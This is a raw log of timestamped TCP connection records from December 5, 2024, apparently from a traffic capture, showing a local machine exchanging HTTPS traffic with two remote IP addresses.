                                                Dec 5, 2024 08:23:49.300111055 CET44349790164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:49.300123930 CET44349789164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:49.300473928 CET49789443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:49.300496101 CET44349789164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:49.301552057 CET44349789164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:49.301620007 CET49789443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:49.303560972 CET49789443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:49.303637028 CET44349789164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:49.347141981 CET49790443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:49.347160101 CET49789443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:49.347184896 CET44349789164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:49.395565033 CET49789443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:49.577903032 CET44349787191.252.140.51192.168.2.5
                                                Dec 5, 2024 08:23:49.577975035 CET44349787191.252.140.51192.168.2.5
                                                Dec 5, 2024 08:23:49.579453945 CET49787443192.168.2.5191.252.140.51
                                                Dec 5, 2024 08:23:49.579967976 CET49787443192.168.2.5191.252.140.51
                                                Dec 5, 2024 08:23:49.579982996 CET44349787191.252.140.51192.168.2.5
                                                Dec 5, 2024 08:23:49.975729942 CET44349790164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:49.975761890 CET44349790164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:49.975795031 CET44349790164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:49.975871086 CET49790443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:49.975917101 CET44349790164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:49.975958109 CET49790443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:50.183363914 CET44349790164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:50.183378935 CET44349790164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:50.183409929 CET44349790164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:50.183562040 CET49790443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:50.183578014 CET44349790164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:50.183605909 CET49790443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:50.183624029 CET49790443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:50.240401030 CET44349790164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:50.240432978 CET44349790164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:50.240571022 CET49790443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:50.240592003 CET44349790164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:50.240641117 CET49790443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:50.372344017 CET44349790164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:50.372354031 CET44349790164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:50.372502089 CET49790443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:50.372524977 CET44349790164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:50.372576952 CET49790443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:50.404738903 CET44349790164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:50.404752016 CET44349790164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:50.404912949 CET49790443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:50.404930115 CET44349790164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:50.404978037 CET49790443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:50.431197882 CET44349790164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:50.431229115 CET44349790164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:50.431384087 CET49790443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:50.431396008 CET44349790164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:50.431442022 CET49790443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:50.486139059 CET44349790164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:50.486177921 CET44349790164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:50.486305952 CET49790443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:50.486320972 CET44349790164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:50.486365080 CET49790443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:50.566045046 CET44349790164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:50.566083908 CET44349790164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:50.566201925 CET49790443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:50.566220045 CET44349790164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:50.566265106 CET49790443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:50.585561991 CET44349790164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:50.585602999 CET44349790164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:50.585741043 CET49790443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:50.585758924 CET44349790164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:50.585812092 CET49790443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:50.607120991 CET44349790164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:50.607155085 CET44349790164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:50.607244015 CET49790443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:50.607255936 CET44349790164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:50.607316971 CET49790443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:50.619534016 CET44349790164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:50.619576931 CET44349790164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:50.619647980 CET49790443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:50.619654894 CET44349790164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:50.619678020 CET49790443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:50.619699955 CET49790443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:50.639370918 CET44349790164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:50.639403105 CET44349790164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:50.639451981 CET49790443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:50.639461040 CET44349790164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:50.639514923 CET49790443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:50.647890091 CET44349790164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:50.647941113 CET44349790164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:50.647972107 CET49790443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:50.647979975 CET44349790164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:50.648025990 CET49790443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:50.648058891 CET44349790164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:50.648104906 CET49790443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:50.716887951 CET49790443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:50.716907978 CET44349790164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:51.028173923 CET49789443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:51.071332932 CET44349789164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:51.735001087 CET44349789164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:51.735033989 CET44349789164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:51.735039949 CET44349789164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:51.735088110 CET44349789164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:51.735095024 CET49789443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:51.735100031 CET44349789164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:51.735111952 CET44349789164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:51.735136032 CET44349789164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:51.735147953 CET49789443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:51.735162020 CET49789443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:51.735194921 CET49789443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:51.770785093 CET44349789164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:51.770833969 CET44349789164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:51.770859003 CET49789443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:51.770870924 CET44349789164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:51.770910978 CET49789443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:51.815759897 CET49789443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:51.824134111 CET44349789164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:51.824148893 CET44349789164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:51.824189901 CET44349789164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:51.824215889 CET44349789164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:51.824223042 CET49789443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:51.824235916 CET44349789164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:51.824269056 CET49789443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:51.824281931 CET49789443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:51.948611975 CET44349789164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:51.948640108 CET44349789164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:51.948688984 CET49789443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:51.948704004 CET44349789164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:51.948745966 CET49789443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:51.948745966 CET49789443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:51.979389906 CET44349789164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:51.979413033 CET44349789164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:51.979474068 CET49789443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:51.979489088 CET44349789164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:51.979517937 CET49789443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:51.979532003 CET49789443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:52.006153107 CET44349789164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:52.006169081 CET44349789164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:52.006253958 CET49789443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:52.006263018 CET44349789164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:52.006330967 CET49789443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:52.127763033 CET44349789164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:52.127789974 CET44349789164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:52.127839088 CET49789443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:52.127852917 CET44349789164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:52.127897978 CET49789443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:52.147471905 CET44349789164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:52.147494078 CET44349789164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:52.147633076 CET49789443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:52.147645950 CET44349789164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:52.147695065 CET49789443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:52.172991037 CET44349789164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:52.173012018 CET44349789164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:52.173141956 CET49789443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:52.173163891 CET44349789164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:52.173223972 CET49789443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:52.185724974 CET44349789164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:52.185743093 CET44349789164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:52.185821056 CET49789443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:52.185832977 CET44349789164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:52.185887098 CET49789443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:52.198729992 CET44349789164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:52.198746920 CET44349789164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:52.198860884 CET49789443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:52.198879004 CET44349789164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:52.198932886 CET49789443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:52.212722063 CET44349789164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:52.212743044 CET44349789164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:52.212795973 CET49789443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:52.212807894 CET44349789164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:52.212838888 CET49789443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:52.212838888 CET49789443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:52.311994076 CET44349789164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:52.312077999 CET49789443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:52.312100887 CET44349789164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:52.312119961 CET44349789164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:52.312218904 CET49789443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:52.312598944 CET49789443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:52.312613964 CET44349789164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:52.457360029 CET49801443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:52.457407951 CET44349801164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:52.457489014 CET49801443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:52.457714081 CET49801443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:52.457727909 CET44349801164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:53.836416006 CET44349801164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:53.836744070 CET49801443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:53.836761951 CET44349801164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:53.837798119 CET44349801164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:53.837898970 CET49801443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:53.838298082 CET49801443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:53.838361025 CET44349801164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:53.838469982 CET49801443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:53.838478088 CET44349801164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:53.879033089 CET49801443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:54.668582916 CET44349801164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:54.668618917 CET44349801164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:54.668626070 CET44349801164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:54.668636084 CET44349801164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:54.668668985 CET44349801164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:54.668720007 CET49801443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:54.668731928 CET44349801164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:54.668785095 CET49801443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:54.668785095 CET49801443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:54.711405039 CET44349801164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:54.711467028 CET44349801164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:54.711565971 CET49801443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:54.711574078 CET44349801164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:54.711627960 CET49801443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:54.711627960 CET49801443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:54.754573107 CET44349801164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:54.754611969 CET44349801164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:54.754777908 CET49801443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:54.754792929 CET44349801164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:54.754858971 CET49801443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:54.885734081 CET44349801164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:54.885765076 CET44349801164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:54.885884047 CET49801443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:54.885912895 CET44349801164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:54.885967970 CET49801443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:54.915621996 CET44349801164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:54.915656090 CET44349801164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:54.915810108 CET49801443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:54.915819883 CET44349801164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:54.915872097 CET49801443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:54.941387892 CET44349801164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:54.941417933 CET44349801164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:54.941513062 CET49801443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:54.941526890 CET44349801164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:54.941565037 CET49801443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:55.060334921 CET44349801164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:55.060388088 CET44349801164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:55.060507059 CET49801443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:55.060544014 CET44349801164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:55.060594082 CET49801443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:55.082844973 CET44349801164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:55.082873106 CET44349801164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:55.083009958 CET49801443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:55.083050013 CET44349801164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:55.083096027 CET49801443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:55.092459917 CET44349801164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:55.092550993 CET49801443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:55.092577934 CET44349801164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:55.112129927 CET44349801164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:55.112155914 CET44349801164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:55.112287998 CET49801443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:55.112307072 CET44349801164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:55.125492096 CET44349801164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:55.125511885 CET44349801164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:55.125641108 CET49801443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:55.125662088 CET44349801164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:55.138600111 CET44349801164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:55.138622999 CET44349801164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:55.138705969 CET49801443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:55.138720036 CET44349801164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:55.147336006 CET44349801164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:55.147377014 CET44349801164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:55.147417068 CET49801443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:55.147425890 CET44349801164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:55.147455931 CET44349801164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:23:55.147463083 CET49801443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:55.147480965 CET49801443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:55.147514105 CET49801443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:55.147746086 CET49801443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:23:55.147756100 CET44349801164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:02.768233061 CET49829443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:02.768277884 CET44349829164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:02.768343925 CET49829443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:02.768874884 CET49830443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:02.768908978 CET44349830164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:02.768958092 CET49830443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:02.770236969 CET49830443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:02.770251036 CET44349830164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:02.770612001 CET49829443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:02.770634890 CET44349829164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:04.151607037 CET44349830164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:04.152050972 CET49830443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:04.152066946 CET44349830164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:04.152409077 CET44349830164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:04.152911901 CET49830443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:04.152911901 CET49830443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:04.152932882 CET44349830164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:04.152945995 CET49830443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:04.152987003 CET44349830164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:04.153601885 CET44349829164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:04.153814077 CET49829443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:04.153840065 CET44349829164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:04.154185057 CET44349829164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:04.154562950 CET49829443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:04.154628038 CET44349829164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:04.205163002 CET49830443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:04.205178022 CET49829443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:04.747499943 CET44349830164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:04.747561932 CET44349830164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:04.747647047 CET49830443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:04.794653893 CET49830443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:04.794678926 CET44349830164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:04.797126055 CET49829443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:04.839350939 CET44349829164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:06.158047915 CET44349829164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:06.158080101 CET44349829164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:06.158093929 CET44349829164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:06.158113003 CET44349829164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:06.158143997 CET44349829164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:06.158216953 CET49829443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:06.158257961 CET44349829164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:06.158276081 CET49829443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:06.158304930 CET49829443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:06.200604916 CET44349829164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:06.200645924 CET44349829164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:06.200803995 CET49829443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:06.200822115 CET44349829164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:06.247184992 CET44349829164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:06.247203112 CET44349829164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:06.247283936 CET49829443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:06.247297049 CET44349829164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:06.294497967 CET49829443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:06.362009048 CET44349829164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:06.362020969 CET44349829164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:06.362056017 CET44349829164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:06.362095118 CET44349829164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:06.362143993 CET49829443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:06.362190962 CET49829443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:06.363979101 CET49829443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:06.364001989 CET44349829164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:06.417049885 CET49839443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:06.417098999 CET44349839164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:06.417196989 CET49839443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:06.417498112 CET49839443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:06.417511940 CET44349839164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:07.796561956 CET44349839164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:07.796863079 CET49839443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:07.796895981 CET44349839164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:07.797933102 CET44349839164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:07.798002005 CET49839443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:07.799684048 CET49839443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:07.799760103 CET44349839164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:07.804306030 CET49839443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:07.804342031 CET44349839164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:07.856106043 CET49839443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:09.021533012 CET44349839164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:09.021560907 CET44349839164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:09.021569967 CET44349839164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:09.021585941 CET44349839164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:09.021591902 CET44349839164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:09.021595955 CET44349839164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:09.021683931 CET49839443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:09.021723986 CET44349839164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:09.021749973 CET49839443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:09.021770954 CET49839443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:09.056566954 CET44349839164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:09.056607962 CET44349839164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:09.056689024 CET49839443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:09.056705952 CET44349839164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:09.056726933 CET49839443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:09.056744099 CET49839443192.168.2.5164.92.191.86
